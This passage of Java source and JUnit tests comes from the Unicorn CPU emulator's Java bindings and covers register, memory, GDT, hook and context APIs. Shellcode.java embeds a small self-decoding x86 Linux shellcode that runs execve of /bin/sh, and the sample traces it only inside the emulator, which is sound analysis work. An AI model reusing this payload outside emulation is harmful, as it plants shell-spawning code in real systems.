Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); uc.mem_map(ADDRESS, 0x1000, UC_PROT_ALL); uc.mem_write(ADDRESS, code); long hook = uc.hook_add(test_i386_hook_mem_invalid_cb, UC_HOOK_MEM_INVALID, 1, 0, null); uc.emu_start(ADDRESS, ADDRESS + code.length, 0, 0); uc.hook_del(hook); } public static void main(String args[]) { if (args.length == 1) { if (args[0].equals("-16")) { test_x86_16(); } else if (args[0].equals("-32")) { test_miss_code(); System.out.println("==================================="); test_i386(); System.out.println("==================================="); test_i386_map_ptr(); System.out.println("==================================="); test_i386_inout(); System.out.println("==================================="); test_i386_context_save(); System.out.println("==================================="); test_i386_jump(); System.out.println("==================================="); test_i386_loop(); System.out.println("==================================="); test_i386_invalid_mem_read(); System.out.println("==================================="); test_i386_invalid_mem_write(); System.out.println("==================================="); test_i386_jump_invalid(); // test_i386_invalid_c6c7(); } else if (args[0].equals("-64")) { test_x86_64(); System.out.println("==================================="); test_x86_64_syscall(); } else if (args[0].equals("-h")) { System.out.println( "Syntax: java samples.Sample_x86 <-16|-32|-64>"); } } else { test_x86_16(); System.out.println("==================================="); test_miss_code(); System.out.println("==================================="); test_i386(); System.out.println("==================================="); test_i386_map_ptr(); System.out.println("==================================="); test_i386_inout(); System.out.println("==================================="); test_i386_context_save(); System.out.println("==================================="); test_i386_jump(); System.out.println("==================================="); test_i386_loop(); System.out.println("==================================="); test_i386_invalid_mem_read(); System.out.println("==================================="); test_i386_invalid_mem_write(); System.out.println("==================================="); test_i386_jump_invalid(); // test_i386_invalid_c6c7(); System.out.println("==================================="); test_x86_64(); System.out.println("==================================="); test_x86_64_syscall(); System.out.println("==================================="); test_i386_invalid_mem_read_in_tb(); System.out.println("==================================="); test_i386_smc_xor(); System.out.println("==================================="); test_i386_mmio(); System.out.println("==================================="); test_i386_hook_mem_invalid(); } } } unicorn-2.1.1/bindings/java/src/test/java/samples/Sample_x86_mmr.java000066400000000000000000000204441467524106700255250ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2016 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* Sample code to demonstrate how to register read/write API */ package samples; import java.nio.ByteBuffer; import java.nio.ByteOrder; import java.util.Arrays; import unicorn.*; public class Sample_x86_mmr implements UnicornConst, X86Const { private static final MemHook hook_mem = (uc, type, address, size, value, user_data) -> { switch (type) { case UC_MEM_WRITE: System.out.format( "mem write at 0x%x, size = %d, value = 0x%x\n", address, size, value); break; default: break; } }; private static final CodeHook hook_code = (uc, address, size, user_data) -> { System.out.format("Executing at 0x%x, ilen = 0x%x\n", address, size); }; public static class SegmentDescriptor { public static final int BYTES = 8; int base; int limit; byte type; // 4 bits byte system; // 1 bit: S flag byte dpl; // 2 bits byte present; // 1 bit: P flag byte avail; // 1 bit byte is_64_code; // 1 bit: L flag byte db; // 1 bit: DB flag byte granularity; // 1 bit: G flag public SegmentDescriptor() { } // VERY basic descriptor init function, sets many fields to user space sane // defaults public SegmentDescriptor(int base, int limit, boolean is_code) { this.base = base; if (limit > 0xfffff) { // need Giant granularity limit >>= 12; this.granularity = 1; } this.limit = limit; // some sane defaults this.dpl = 3; this.present = 1; this.db = 1; // 32 bit this.type = is_code ? (byte) 0xb : 3; this.system = 1; // code or data } public void appendToBuffer(ByteBuffer buf) { buf.putShort((short) limit); buf.putShort((short) base); buf.put((byte) (base >>> 16)); buf.put( (byte) (type | (system << 4) | (dpl << 5) | (present << 7))); buf.put((byte) (((limit >>> 16) & 0xf) | (avail << 4) | (is_64_code << 5) | (db << 6) | (granularity << 7))); buf.put((byte) (base >>> 24)); } } public static void test_x86_mmr() { System.out.println("Test x86 MMR read/write"); // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); // map 4k uc.mem_map(0x400000, 0x1000, UC_PROT_ALL); X86_MMR ldtr1 = new X86_MMR(0x1111111122222222L, 0x33333333, 0x44444444, (short) 0x5555); X86_MMR ldtr2; X86_MMR gdtr1 = new X86_MMR(0x6666666677777777L, 0x88888888, 0x99999999, (short) 0xaaaa); X86_MMR gdtr2; long eax; // initialize machine registers uc.reg_write(UC_X86_REG_LDTR, ldtr1); uc.reg_write(UC_X86_REG_GDTR, gdtr1); uc.reg_write(UC_X86_REG_EAX, 0xddddddddL); // read the registers back out eax = uc.reg_read(UC_X86_REG_EAX); ldtr2 = (X86_MMR) uc.reg_read(UC_X86_REG_LDTR, null); gdtr2 = (X86_MMR) uc.reg_read(UC_X86_REG_GDTR, null); System.out.printf(">>> EAX = 0x%x\n", eax); System.out.printf(">>> LDTR.base = 0x%x\n", ldtr2.base); System.out.printf(">>> LDTR.limit = 0x%x\n", ldtr2.limit); System.out.printf(">>> LDTR.flags = 0x%x\n", ldtr2.flags); System.out.printf(">>> LDTR.selector = 0x%x\n\n", ldtr2.selector); System.out.printf(">>> GDTR.base = 0x%x\n", gdtr2.base); System.out.printf(">>> GDTR.limit = 0x%x\n", gdtr2.limit); } public static void gdt_demo() { System.out.println("Demonstrate GDT usage"); /* bits 32 push dword 0x01234567 push dword 0x89abcdef mov dword [fs:0], 0x01234567 mov dword [fs:4], 0x89abcdef */ final byte[] code = Utils.hexToBytes("686745230168efcdab8964c70500000000" + "6745230164c70504000000efcdab89"); final long code_address = 0x1000000L; final long stack_address = 0x120000L; final long gdt_address = 0xc0000000L; final long fs_address = 0x7efdd000L; SegmentDescriptor[] gdt = new SegmentDescriptor[31]; int r_esp = (int) stack_address + 0x1000; // initial esp int r_cs = 0x73; int r_ss = 0x88; // ring 0 int r_ds = 0x7b; int r_es = 0x7b; int r_fs = 0x83; X86_MMR gdtr = new X86_MMR(gdt_address, gdt.length * SegmentDescriptor.BYTES - 1); gdt[14] = new SegmentDescriptor(0, 0xfffff000, true); // code segment gdt[15] = new SegmentDescriptor(0, 0xfffff000, false); // data segment gdt[16] = new SegmentDescriptor((int) fs_address, 0xfff, false); // one page data segment simulate fs gdt[17] = new SegmentDescriptor(0, 0xfffff000, false); // ring 0 data gdt[17].dpl = 0; // set descriptor privilege level // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); uc.hook_add(hook_code, code_address, code_address + code.length, null); uc.hook_add(hook_mem, UC_HOOK_MEM_WRITE, 1, 0, null); // map 1 page of code for this emulation uc.mem_map(code_address, 0x1000, UC_PROT_ALL); // map 1 page of stack for this emulation uc.mem_map(stack_address, 0x1000, UC_PROT_READ | UC_PROT_WRITE); // map 64k for a GDT uc.mem_map(gdt_address, 0x10000, UC_PROT_WRITE | UC_PROT_READ); // set up a GDT BEFORE you manipulate any segment registers uc.reg_write(UC_X86_REG_GDTR, gdtr); // write gdt to be emulated to memory ByteBuffer gdt_buf = ByteBuffer.allocate(gdt.length * SegmentDescriptor.BYTES) .order(ByteOrder.LITTLE_ENDIAN); for (SegmentDescriptor desc : gdt) { if (desc == null) { gdt_buf.put(new byte[SegmentDescriptor.BYTES]); } else { desc.appendToBuffer(gdt_buf); } } uc.mem_write(gdt_address, gdt_buf.array()); // map 1 page for FS uc.mem_map(fs_address, 0x1000, UC_PROT_WRITE | UC_PROT_READ); // write machine code to be emulated to memory uc.mem_write(code_address, code); // initialize machine registers uc.reg_write(UC_X86_REG_ESP, r_esp); // when setting SS, need rpl == cpl && dpl == cpl // emulator starts with cpl == 0, so we need a dpl 0 descriptor and rpl 0 // selector uc.reg_write(UC_X86_REG_SS, r_ss); uc.reg_write(UC_X86_REG_CS, r_cs); uc.reg_write(UC_X86_REG_DS, r_ds); uc.reg_write(UC_X86_REG_ES, r_es); uc.reg_write(UC_X86_REG_FS, r_fs); // emulate machine code in infinite time uc.emu_start(code_address, code_address + code.length, 0, 0); // read from memory byte[] buf = uc.mem_read(r_esp - 8, 8); for (int i = 0; i < 8; i++) { System.out.format("%02x", buf[i] & 0xff); } System.out.println(); assert Arrays.equals(buf, Utils.hexToBytes("efcdab8967452301")); // read from memory buf = uc.mem_read(fs_address, 8); assert Arrays.equals(buf, Utils.hexToBytes("67452301efcdab89")); } public static void main(String args[]) { test_x86_mmr(); System.out.println("==================================="); gdt_demo(); } } unicorn-2.1.1/bindings/java/src/test/java/samples/Shellcode.java000066400000000000000000000110671467524106700246270ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh & Dang Hoang Vu, 2015 */ /* Sample code to trace code with Linux code with syscall */ package samples; import unicorn.*; public class Shellcode implements UnicornConst, X86Const { public static final byte[] X86_CODE32_SELF = Utils.hexToBytes( "eb1c5a89d68b02663dca7d75066605030389" + "02fec23d4141414175e9ffe6e8dfffffff31" + "d26a0b589952682f2f7368682f62696e89e3" + "525389e1ca7d4141414141414141"); // memory address where emulation starts public static final int ADDRESS = 0x1000000; public static CodeHook hook_code = (u, address, size, user) -> { System.out.format( "Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size); long r_eip = u.reg_read(UC_X86_REG_EIP); System.out.format("*** EIP = %x ***: ", r_eip); byte[] tmp = u.mem_read(address, size); for (int i = 0; i < tmp.length; i++) { System.out.format("%x ", 0xff & tmp[i]); } System.out.println(); }; public static InterruptHook hook_intr = (u, intno, user) -> { // only handle Linux syscall if (intno != 0x80) { return; } long r_eax = u.reg_read(UC_X86_REG_EAX); long r_eip = u.reg_read(UC_X86_REG_EIP); switch ((int) r_eax) { default: System.out.format(">>> 0x%x: interrupt 0x%x, EAX = 0x%x\n", r_eip, intno, r_eax); break; case 1: // sys_exit System.out.format( ">>> 0x%x: interrupt 0x%x, SYS_EXIT. quit!\n\n", r_eip, intno); u.emu_stop(); break; case 4: { // sys_write // ECX = buffer address long r_ecx = u.reg_read(UC_X86_REG_ECX); // EDX = buffer size long r_edx = u.reg_read(UC_X86_REG_EDX); // read the buffer in int size = (int) Math.min(256, r_edx); try { byte[] buffer = u.mem_read(r_ecx, size); System.out.format( ">>> 0x%x: interrupt 0x%x, SYS_WRITE. buffer = 0x%x, size = %u, content = '%s'\n", r_eip, intno, r_ecx, r_edx, new String(buffer)); } catch (UnicornException e) { System.out.format( ">>> 0x%x: interrupt 0x%x, SYS_WRITE. buffer = 0x%x, size = %u (cannot get content)\n", r_eip, intno, r_ecx, r_edx); } break; } } }; public static void test_i386() { long r_esp = ADDRESS + 0x200000L; // ESP register System.out.println("Emulate i386 code"); // Initialize emulator in X86-32bit mode Unicorn u = new Unicorn(UC_ARCH_X86, UC_MODE_32); // map 2MB memory for this emulation u.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory u.mem_write(ADDRESS, X86_CODE32_SELF); // initialize machine registers u.reg_write(UC_X86_REG_ESP, r_esp); // tracing all instructions by having @begin > @end u.hook_add(hook_code, 1, 0, null); // handle interrupt ourself u.hook_add(hook_intr, null); System.out.println("\n>>> Start tracing this Linux code"); // emulate machine code in infinite time // u.emu_start(ADDRESS, ADDRESS + X86_CODE32_SELF.length, 0, 12); <--- emulate only 12 instructions u.emu_start(ADDRESS, ADDRESS + X86_CODE32_SELF.length, 0, 0); System.out.println("\n>>> Emulation done."); } public static void main(String args[]) { if (args.length == 1) { if ("-32".equals(args[0])) { test_i386(); } } else { System.out.println("Syntax: java Shellcode <-32|-64>"); } } } unicorn-2.1.1/bindings/java/src/test/java/samples/Utils.java000066400000000000000000000024021467524106700240160ustar00rootroot00000000000000package samples; public class Utils { public static byte[] hexToBytes(String s) { int len = s.length(); byte[] data = new byte[len / 2]; for (int i = 0; i < len; i += 2) { data[i / 2] = (byte) ((Character.digit(s.charAt(i), 16) << 4) + Character.digit(s.charAt(i + 1), 16)); } return data; } public static final int toInt(byte val[]) { int res = 0; for (int i = 0; i < val.length; i++) { int v = val[i] & 0xff; res = res + (v << (i * 8)); } return res; } public static final long toLong(byte val[]) { long res = 0; for (int i = 0; i < val.length; i++) { long v = val[i] & 0xff; res = res + (v << (i * 8)); } return res; } public static final byte[] toBytes(int val) { byte[] res = new byte[4]; for (int i = 0; i < 4; i++) { res[i] = (byte) (val & 0xff); val >>>= 8; } return res; } public static final byte[] toBytes(long val) { byte[] res = new byte[8]; for (int i = 0; i < 8; i++) { res[i] = (byte) (val & 0xff); val >>>= 8; } return res; } } unicorn-2.1.1/bindings/java/src/test/java/tests/000077500000000000000000000000001467524106700215535ustar00rootroot00000000000000unicorn-2.1.1/bindings/java/src/test/java/tests/FunctionalityTests.java000066400000000000000000000166411467524106700263010ustar00rootroot00000000000000package tests; import static org.junit.Assert.assertEquals; import static org.junit.Assert.assertThrows; import static org.junit.Assert.assertTrue; import org.junit.Test; import unicorn.Unicorn; import unicorn.UnicornException; /** Test miscellaneous features that don't fall into the register, memory * or hook API */ public class FunctionalityTests { @Test public void testStatics() { assertEquals(true, Unicorn.arch_supported(Unicorn.UC_ARCH_X86)); assertEquals(false, Unicorn.arch_supported(Unicorn.UC_ARCH_MAX + 1)); assertTrue("version check", Unicorn.version() >= 0x02000100); assertEquals("OK (UC_ERR_OK)", Unicorn.strerror(Unicorn.UC_ERR_OK)); assertEquals("Invalid handle (UC_ERR_HANDLE)", Unicorn.strerror(Unicorn.UC_ERR_HANDLE)); } @Test public void testCreation() { assertThrows(UnicornException.class, () -> new Unicorn(Unicorn.UC_ARCH_MAX + 1, 0)); if (Unicorn.arch_supported(Unicorn.UC_ARCH_X86)) { new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_16); new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_64); assertThrows(UnicornException.class, () -> new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_BIG_ENDIAN)); } if (Unicorn.arch_supported(Unicorn.UC_ARCH_M68K)) { new Unicorn(Unicorn.UC_ARCH_M68K, Unicorn.UC_MODE_BIG_ENDIAN); assertThrows(UnicornException.class, () -> new Unicorn(Unicorn.UC_ARCH_M68K, Unicorn.UC_MODE_LITTLE_ENDIAN)); } if (Unicorn.arch_supported(Unicorn.UC_ARCH_ARM)) { new Unicorn(Unicorn.UC_ARCH_ARM, 0); new Unicorn(Unicorn.UC_ARCH_ARM, Unicorn.UC_MODE_BIG_ENDIAN); new Unicorn(Unicorn.UC_ARCH_ARM, Unicorn.UC_MODE_THUMB); } if (Unicorn.arch_supported(Unicorn.UC_ARCH_ARM64)) { new Unicorn(Unicorn.UC_ARCH_ARM64, 0); new Unicorn(Unicorn.UC_ARCH_ARM64, Unicorn.UC_MODE_BIG_ENDIAN); } if (Unicorn.arch_supported(Unicorn.UC_ARCH_MIPS)) { new Unicorn(Unicorn.UC_ARCH_MIPS, Unicorn.UC_MODE_BIG_ENDIAN | Unicorn.UC_MODE_32); new Unicorn(Unicorn.UC_ARCH_MIPS, Unicorn.UC_MODE_LITTLE_ENDIAN | Unicorn.UC_MODE_32); new Unicorn(Unicorn.UC_ARCH_MIPS, Unicorn.UC_MODE_BIG_ENDIAN | Unicorn.UC_MODE_64); new Unicorn(Unicorn.UC_ARCH_MIPS, Unicorn.UC_MODE_LITTLE_ENDIAN | Unicorn.UC_MODE_64); assertThrows(UnicornException.class, () -> new Unicorn(Unicorn.UC_ARCH_MIPS, Unicorn.UC_MODE_16)); } if (Unicorn.arch_supported(Unicorn.UC_ARCH_SPARC)) { new Unicorn(Unicorn.UC_ARCH_SPARC, Unicorn.UC_MODE_BIG_ENDIAN | Unicorn.UC_MODE_32); new Unicorn(Unicorn.UC_ARCH_SPARC, Unicorn.UC_MODE_BIG_ENDIAN | Unicorn.UC_MODE_64); assertThrows(UnicornException.class, () -> new Unicorn(Unicorn.UC_ARCH_SPARC, Unicorn.UC_MODE_LITTLE_ENDIAN | Unicorn.UC_MODE_32)); } if (Unicorn.arch_supported(Unicorn.UC_ARCH_PPC)) { new Unicorn(Unicorn.UC_ARCH_PPC, Unicorn.UC_MODE_BIG_ENDIAN | Unicorn.UC_MODE_32); new Unicorn(Unicorn.UC_ARCH_PPC, Unicorn.UC_MODE_BIG_ENDIAN | Unicorn.UC_MODE_64); assertThrows(UnicornException.class, () -> new Unicorn(Unicorn.UC_ARCH_PPC, Unicorn.UC_MODE_LITTLE_ENDIAN | Unicorn.UC_MODE_32)); } if (Unicorn.arch_supported(Unicorn.UC_ARCH_RISCV)) { new Unicorn(Unicorn.UC_ARCH_RISCV, Unicorn.UC_MODE_32); new Unicorn(Unicorn.UC_ARCH_RISCV, Unicorn.UC_MODE_64); } if (Unicorn.arch_supported(Unicorn.UC_ARCH_S390X)) { new Unicorn(Unicorn.UC_ARCH_S390X, Unicorn.UC_MODE_BIG_ENDIAN); assertThrows(UnicornException.class, () -> new Unicorn(Unicorn.UC_ARCH_S390X, Unicorn.UC_MODE_LITTLE_ENDIAN)); new Unicorn(Unicorn.UC_ARCH_TRICORE, 0); } } @Test public void testThreading() { // EB FE - label: jmp label final byte[] X86_CODE = { -21, -2 }; long ADDRESS = 0x100000; Unicorn u = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); u.mem_write(ADDRESS, X86_CODE); new Thread(() -> { try { Thread.sleep(500); } catch (InterruptedException e) { e.printStackTrace(); } u.emu_stop(); }).start(); u.emu_start(ADDRESS, ADDRESS + X86_CODE.length, 0, 0); } @Test public void testContext() { Unicorn uc = new Unicorn(Unicorn.UC_ARCH_ARM64, Unicorn.UC_MODE_ARM); uc.reg_write(Unicorn.UC_ARM64_REG_X0, 0xdeadbeefL); Unicorn.Context ctx = uc.context_save(); assertEquals(0xdeadbeefL, uc.reg_read(Unicorn.UC_ARM64_REG_X0)); assertEquals(0xdeadbeefL, ctx.reg_read(Unicorn.UC_ARM64_REG_X0)); uc.reg_write(Unicorn.UC_ARM64_REG_X0, 0xfeedfaceL); assertEquals(0xfeedfaceL, uc.reg_read(Unicorn.UC_ARM64_REG_X0)); assertEquals(0xdeadbeefL, ctx.reg_read(Unicorn.UC_ARM64_REG_X0)); uc.context_restore(ctx); assertEquals(0xdeadbeefL, uc.reg_read(Unicorn.UC_ARM64_REG_X0)); assertEquals(0xdeadbeefL, ctx.reg_read(Unicorn.UC_ARM64_REG_X0)); uc.reg_write(Unicorn.UC_ARM64_REG_X0, 0xfee1deadL); assertEquals(0xfee1deadL, uc.reg_read(Unicorn.UC_ARM64_REG_X0)); assertEquals(0xdeadbeefL, ctx.reg_read(Unicorn.UC_ARM64_REG_X0)); uc.context_update(ctx); assertEquals(0xfee1deadL, uc.reg_read(Unicorn.UC_ARM64_REG_X0)); assertEquals(0xfee1deadL, ctx.reg_read(Unicorn.UC_ARM64_REG_X0)); uc.reg_write(Unicorn.UC_ARM64_REG_X0, 0xdeadbeefL); assertEquals(0xdeadbeefL, uc.reg_read(Unicorn.UC_ARM64_REG_X0)); assertEquals(0xfee1deadL, ctx.reg_read(Unicorn.UC_ARM64_REG_X0)); uc.context_restore(ctx); assertEquals(0xfee1deadL, uc.reg_read(Unicorn.UC_ARM64_REG_X0)); assertEquals(0xfee1deadL, ctx.reg_read(Unicorn.UC_ARM64_REG_X0)); } @Test public void testOldContext() { Unicorn uc = new Unicorn(Unicorn.UC_ARCH_ARM64, Unicorn.UC_MODE_ARM); uc.reg_write(Unicorn.UC_ARM64_REG_X0, 0xdeadbeefL); long ctx = uc.context_alloc(); uc.context_save(ctx); assertEquals(0xdeadbeefL, uc.reg_read(Unicorn.UC_ARM64_REG_X0)); uc.reg_write(Unicorn.UC_ARM64_REG_X0, 0xfeedfaceL); assertEquals(0xfeedfaceL, uc.reg_read(Unicorn.UC_ARM64_REG_X0)); uc.context_restore(ctx); assertEquals(0xdeadbeefL, uc.reg_read(Unicorn.UC_ARM64_REG_X0)); uc.reg_write(Unicorn.UC_ARM64_REG_X0, 0xfee1deadL); assertEquals(0xfee1deadL, uc.reg_read(Unicorn.UC_ARM64_REG_X0)); uc.context_save(ctx); assertEquals(0xfee1deadL, uc.reg_read(Unicorn.UC_ARM64_REG_X0)); uc.reg_write(Unicorn.UC_ARM64_REG_X0, 0xdeadbeefL); assertEquals(0xdeadbeefL, uc.reg_read(Unicorn.UC_ARM64_REG_X0)); uc.context_restore(ctx); assertEquals(0xfee1deadL, uc.reg_read(Unicorn.UC_ARM64_REG_X0)); uc.free(ctx); } } unicorn-2.1.1/bindings/java/src/test/java/tests/HookTests.java000066400000000000000000000114221467524106700243410ustar00rootroot00000000000000package tests; import static org.junit.Assert.assertEquals; import static org.junit.Assert.assertThrows; import org.junit.Test; import unicorn.CodeHook; import unicorn.EdgeGeneratedHook; import unicorn.TlbFillHook; import unicorn.TranslationBlock; import unicorn.Unicorn; import unicorn.UnicornException; public class HookTests { private static void assertTranslationBlock(TranslationBlock expected, TranslationBlock actual) { assertEquals(expected.pc, actual.pc); assertEquals(expected.icount, actual.icount); assertEquals(expected.size, actual.size); } @Test public void testEdgeHook() { /* 00000000 83FB01 cmp ebx,byte +0x1 00000003 7405 jz 0xa 00000005 B802000000 mov eax,0x2 0000000A 40 inc eax 0000000B EBFE jmp short 0xb */ final byte[] X86_CODE = { -125, -5, 1, 116, 5, -72, 2, 0, 0, 0, 64, -21, -2 }; final TranslationBlock[] expectedTb = { null, null }; long ADDRESS = 0x100000; Unicorn u = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); u.mem_write(ADDRESS, X86_CODE); expectedTb[1] = new TranslationBlock(ADDRESS, 2, 5); u.hook_add((EdgeGeneratedHook) (uc, cur_tb, prev_tb, user) -> { assertTranslationBlock(expectedTb[0], cur_tb); assertTranslationBlock(expectedTb[1], prev_tb); assertEquals("user data", user); }, ADDRESS, ADDRESS + 10, "user data"); // TODO(nneonneo): why is icount 2/3 in the subsequent blocks? expectedTb[0] = new TranslationBlock(ADDRESS + 10, 2, 1); u.reg_write(Unicorn.UC_X86_REG_EBX, 1); u.emu_start(ADDRESS, ADDRESS + 11, 0, 0); expectedTb[0] = new TranslationBlock(ADDRESS + 5, 3, 6); u.reg_write(Unicorn.UC_X86_REG_EBX, 0); u.emu_start(ADDRESS, ADDRESS + 11, 0, 0); assertTranslationBlock(new TranslationBlock(ADDRESS, 2, 5), u.ctl_request_cache(ADDRESS)); // TODO(nneonneo): I don't totally understand this output! Why 8 bytes at address 5? assertTranslationBlock(new TranslationBlock(ADDRESS + 5, 3, 8), u.ctl_request_cache(ADDRESS + 5)); } @Test public void testTlbHook() { // mov ecx, [0xaaaaaaa8] final byte[] X86_CODE32_MEM_READ = { -117, 13, -88, -86, -86, -86 }; long ADDRESS = 0x100000; Unicorn u = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); u.mem_map(0xbbbbb000L, 0x1000, Unicorn.UC_PROT_READ); u.hook_add((TlbFillHook) (uc, address, type, user_data) -> { assertEquals("fill hook address", 0xaaaaa000L, address); assertEquals("fill hook type", Unicorn.UC_MEM_READ, type); assertEquals("fill hook user", "fill_hook", user_data); return 0xbbbbb000L | Unicorn.UC_PROT_READ; }, 0xaaaaa000L, 0xaaaab000L, "fill_hook"); u.mem_write(ADDRESS, X86_CODE32_MEM_READ); u.mem_write(0xbbbbbaa8L, new byte[] { 1, 2, 3, 4 }); u.reg_write(Unicorn.UC_X86_REG_ECX, 0x12345678); u.ctl_tlb_mode(Unicorn.UC_TLB_VIRTUAL); u.emu_start(ADDRESS, ADDRESS + X86_CODE32_MEM_READ.length, 0, 0); assertEquals("ecx", u.reg_read(Unicorn.UC_X86_REG_ECX), 0x04030201); } @Test public void testRemoveHook() { byte[] X86_CODE = { 0x40, 0x40, 0x40, 0x40 }; // (inc eax) x 4 int ADDRESS = 0x10000; final int[] hook_accum = { 0 }; Unicorn u = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); u.mem_write(ADDRESS, X86_CODE); CodeHook hook = (uc, address, size, user) -> hook_accum[0] += (int) user; long h1 = u.hook_add(hook, ADDRESS, ADDRESS, 1); long h2 = u.hook_add(hook, ADDRESS + 1, ADDRESS + 1, 2); long h3 = u.hook_add(hook, ADDRESS + 2, ADDRESS + 2, 4); long h4 = u.hook_add(hook, ADDRESS + 3, ADDRESS + 3, 8); hook_accum[0] = 0; u.emu_start(ADDRESS, ADDRESS + X86_CODE.length, 0, 0); assertEquals(15, hook_accum[0]); u.hook_del(h2); hook_accum[0] = 0; u.emu_start(ADDRESS, ADDRESS + X86_CODE.length, 0, 0); assertEquals(13, hook_accum[0]); u.hook_del(hook); hook_accum[0] = 0; u.emu_start(ADDRESS, ADDRESS + X86_CODE.length, 0, 0); assertEquals(0, hook_accum[0]); assertThrows(UnicornException.class, () -> u.hook_del(h1)); assertThrows(UnicornException.class, () -> u.hook_del(h3)); assertThrows(UnicornException.class, () -> u.hook_del(h4)); } } unicorn-2.1.1/bindings/java/src/test/java/tests/MemTests.java000066400000000000000000000123561467524106700241660ustar00rootroot00000000000000package tests; import static org.junit.Assert.assertEquals; import java.nio.ByteBuffer; import java.nio.ByteOrder; import org.junit.Test; import unicorn.MemRegion; import unicorn.Unicorn; public class MemTests { private static void assertMemRegion(long address, long size, int perms, MemRegion actual) { assertEquals(address, actual.begin); assertEquals(address + size - 1, actual.end); assertEquals(perms, actual.perms); } @Test public void testMemRegions() { Unicorn uc = new Unicorn(Unicorn.UC_ARCH_ARM64, Unicorn.UC_MODE_ARM); long ADDR1 = 0x10000; long ADDR2 = 0xdeadbeeffeed1000L; uc.mem_map(ADDR1, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); uc.mem_map(ADDR2, 4096, Unicorn.UC_PROT_READ); MemRegion[] arr = uc.mem_regions(); assertEquals("two memory regions", 2, arr.length); assertMemRegion(ADDR1, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL, arr[0]); assertMemRegion(ADDR2, 4096, Unicorn.UC_PROT_READ, arr[1]); } @Test public void testMemRegions2() { Unicorn u = new Unicorn(Unicorn.UC_ARCH_TRICORE, 0); u.mem_map(0x10000, 0x10000, Unicorn.UC_PROT_ALL); u.mem_map(0x30000, 0x10000, Unicorn.UC_PROT_READ); u.mem_map(0x50000, 0x10000, Unicorn.UC_PROT_READ | Unicorn.UC_PROT_WRITE); u.mem_map(0x70000, 0x20000, 0); u.mem_protect(0x80000, 0x10000, Unicorn.UC_PROT_EXEC); ByteBuffer buf = ByteBuffer.allocateDirect(0x10000); u.mem_map_ptr(0x110000, buf, Unicorn.UC_PROT_ALL); u.mmio_map(0x210000, 0x10000, (uc, offset, size, user_data) -> 0x41414141, null, (uc, offset, size, value, user_data) -> { }, null); u.mmio_map(0x230000, 0x10000, (uc, offset, size, user_data) -> 0x41414141, null, null, null); u.mmio_map(0x250000, 0x10000, null, null, (uc, offset, size, value, user_data) -> { }, null); u.mmio_map(0x270000, 0x10000, null, null, null, null); MemRegion[] mrs = u.mem_regions(); assertEquals(10, mrs.length); assertMemRegion(0x10000, 0x10000, Unicorn.UC_PROT_ALL, mrs[0]); assertMemRegion(0x30000, 0x10000, Unicorn.UC_PROT_READ, mrs[1]); assertMemRegion(0x50000, 0x10000, Unicorn.UC_PROT_READ | Unicorn.UC_PROT_WRITE, mrs[2]); assertMemRegion(0x70000, 0x10000, Unicorn.UC_PROT_NONE, mrs[3]); assertMemRegion(0x80000, 0x10000, Unicorn.UC_PROT_EXEC, mrs[4]); assertMemRegion(0x110000, 0x10000, Unicorn.UC_PROT_ALL, mrs[5]); assertMemRegion(0x210000, 0x10000, Unicorn.UC_PROT_READ | Unicorn.UC_PROT_WRITE, mrs[6]); assertMemRegion(0x230000, 0x10000, Unicorn.UC_PROT_READ, mrs[7]); assertMemRegion(0x250000, 0x10000, Unicorn.UC_PROT_WRITE, mrs[8]); assertMemRegion(0x270000, 0x10000, Unicorn.UC_PROT_NONE, mrs[9]); } @Test public void testMmio() { // mov ecx, [0xaaaaaaa8]; inc ecx; dec edx; mov [0xaaaaaaa8], ecx; inc ecx; dec edx final byte[] X86_CODE32_MEM_READ_WRITE = { -117, 13, -88, -86, -86, -86, 65, 74, -119, 13, -88, -86, -86, -86, 65, 74 }; long ADDRESS = 0x100000; Unicorn u = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); // map 2MB memory for this emulation u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); // write machine code to be emulated to memory u.mem_write(ADDRESS, X86_CODE32_MEM_READ_WRITE); // initialize machine registers u.reg_write(Unicorn.UC_X86_REG_ECX, 0x12345678); 